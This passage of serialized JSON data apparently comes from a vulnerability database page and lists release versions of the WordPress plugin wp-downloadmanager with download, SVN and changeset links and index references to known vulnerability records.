iff":55,"diff_files_changed":929,"diff_lines":39,"trac_diff_url":930,"vulnerabilities":931,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.8&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.9",[932,933,934,935,936],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":86,"url_slug":87,
"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":938,"download_url":939,"svn_tag_url":940,"released_at":39,"has_diff":55,"diff_files_changed":941,"diff_lines":39,"trac_diff_url":942,"vulnerabilities":943,"is_current":55},"1.68.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.7&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.8",[944,945,946,947,948,949],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":149,"download_url":951,"svn_tag_url":952,"released_at":39,"has_diff":55,"diff_files_changed":953,"diff_lines":39,"trac_diff_url":954,"vulnerabilities":955,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.7\u002F",[],"https:\u002F\u00
2Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.6&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.7",[956,957,958,959,960,961],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":963,"download_url":964,"svn_tag_url":965,"released_at":39,"has_diff":55,"diff_files_changed":966,"diff_lines":39,"trac_diff_url":967,"vulnerabilities":968,"is_current":55},"1.68.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.5&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.6",[969,970,971,972,973,974,975,976,977],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"p
atched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":185,"download_url":979,"svn_tag_url":980,"released_at":39,"has_diff":55,"diff_files_changed":981,"diff_lines":39,"trac_diff_url":982,"vulnerabilities":983,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.4&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.5",[984,985,986,987,988,989,990,991,992],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":994,"download_url":995,"svn_tag_url":996,"released_at":39,"has_diff":55,"diff_files_changed":997,"di
ff_lines":39,"trac_diff_url":998,"vulnerabilities":999,"is_current":55},"1.68.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.2&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.4",[1000,1001,1002,1003,1004,1005,1006,1007,1008,1009],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1011,"download_url":1012,"svn_tag_url":1013,"released_at":39,"has_diff":55,"diff_files_changed":1014,"diff_lines":39,"trac_diff_url":1015,"vulnerabilities":1016,"is_current":55},"1.68.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002
Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.1&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.2",[1017,1018,1019,1020,1021,1022,1023,1024,1025,1026],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1028,"download_url":1029,"svn_tag_url":1030,"released_at":39,"has_diff":55,"diff_files_changed":1031,"diff_lines":39,"trac_diff_url":1032,"vulnerabilities":1033,"is_current":55},"1.68.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.67&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.1",[1034,1035,1036,1037,1038,1039,1040,1041,1042,1043],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":
134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1045,"download_url":1046,"svn_tag_url":1047,"released_at":39,"has_diff":55,"diff_files_changed":1048,"diff_lines":39,"trac_diff_url":1049,"vulnerabilities":1050,"is_current":55},"1.67","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.67.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.67\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.66&new_path=%2Fwp-downloadmanager%2Ftags%2F1.67",[1051,1052,1053,1054,1055,1056,1057,1058,1059,1060],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln
_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1062,"download_url":1063,"svn_tag_url":1064,"released_at":39,"has_diff":55,"diff_files_changed":1065,"diff_lines":39,"trac_diff_url":1066,"vulnerabilities":1067,"is_current":55},"1.66","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.66.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.66\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.65&new_path=%2Fwp-downloadmanager%2Ftags%2F1.66",[1068,1069,1070,1071,1072,1073,1074,1075,1076,1077],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188
,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1079,"download_url":1080,"svn_tag_url":1081,"released_at":39,"has_diff":55,"diff_files_changed":1082,"diff_lines":39,"trac_diff_url":1083,"vulnerabilities":1084,"is_current":55},"1.65","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.65.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.65\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.64&new_path=%2Fwp-downloadmanager%2Ftags%2F1.65",[1085,1086,1087,1088,1089,1090,1091,1092,1093,1094],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1096,"download_url":1097,"svn_tag_url":1098,"released_at":39,"has_diff":55,"
diff_files_changed":1099,"diff_lines":39,"trac_diff_url":1100,"vulnerabilities":1101,"is_current":55},"1.64","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.64.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.64\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.63&new_path=%2Fwp-downloadmanager%2Ftags%2F1.64",[1102,1103,1104,1105,1106,1107,1108,1109,1110,1111],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1113,"download_url":1114,"svn_tag_url":1115,"released_at":39,"has_diff":55,"diff_files_changed":1116,"diff_lines":39,"trac_diff_url":1117,"vulnerabilities":1118,"is_current":55},"1.63","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.63.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.63\u002F",[],"https:\u002F\u002Fplugins.trac.word
press.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.62&new_path=%2Fwp-downloadmanager%2Ftags%2F1.63",[1119,1120,1121,1122,1123,1124,1125,1126,1127,1128],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1130,"download_url":1131,"svn_tag_url":1132,"released_at":39,"has_diff":55,"diff_files_changed":1133,"diff_lines":39,"trac_diff_url":1134,"vulnerabilities":1135,"is_current":55},"1.62","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.62.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.62\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.61&new_path=%2Fwp-downloadmanager%2Ftags%2F1.62",[1136,1137,1138,1139,1140,1141,1142,1143,1144,1145],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score
":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1147,"download_url":1148,"svn_tag_url":1149,"released_at":39,"has_diff":55,"diff_files_changed":1150,"diff_lines":39,"trac_diff_url":1151,"vulnerabilities":1152,"is_current":55},"1.61","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.61.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.61\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.50&new_path=%2Fwp-downloadmanager%2Ftags%2F1.61",[1153,1154,1155,1156,1157,1158,1159,1160,1161,1162],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vu
ln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1164,"download_url":1165,"svn_tag_url":1166,"released_at":39,"has_diff":55,"diff_files_changed":1167,"diff_lines":39,"trac_diff_url":1168,"vulnerabilities":1169,"is_current":55},"1.50","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.50.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.50\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.40&new_path=%2Fwp-downloadmanager%2Ftags%2F1.50",[1170,1171,1172,1173,1174,1175,1176,1177,1178,1179],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":1
88,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1181,"download_url":1182,"svn_tag_url":1183,"released_at":39,"has_diff":55,"diff_files_changed":1184,"diff_lines":39,"trac_diff_url":1185,"vulnerabilities":1186,"is_current":55},"1.40","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.40.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.40\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.31&new_path=%2Fwp-downloadmanager%2Ftags%2F1.40",[1187,1188,1189,1190,1191,1192,1193,1194,1195,1196],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1198,"download_url":1199,"svn_tag_url":1200,"released_at":39,"has_diff":55
,"diff_files_changed":1201,"diff_lines":39,"trac_diff_url":1202,"vulnerabilities":1203,"is_current":55},"1.31","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.31.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.31\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.30&new_path=%2Fwp-downloadmanager%2Ftags%2F1.31",[1204,1205,1206,1207,1208,1209,1210,1211,1212,1213],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":169,"url_slug":170,"title":171,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":144,"url_slug":145,"title":146,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":180,"url_slug":181,"title":182,"severity":41,"cvss_score":186,"vuln_type":188,"patched_in_version":185},{"id":159,"url_slug":160,"title":161,"severity":41,"cvss_score":150,"vuln_type":136,"patched_in_version":149},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":1215,"download_url":1216,"svn_tag_url":1217,"released_at":39,"has_diff":55,"diff_files_changed":1218,"diff_lines":39,"trac_diff_url":1219,"vulnerabilities":1220,"is_current":55},"1.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.30.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.30\u002F",[],"https:\u002F\u002Fplugins.trac.wo
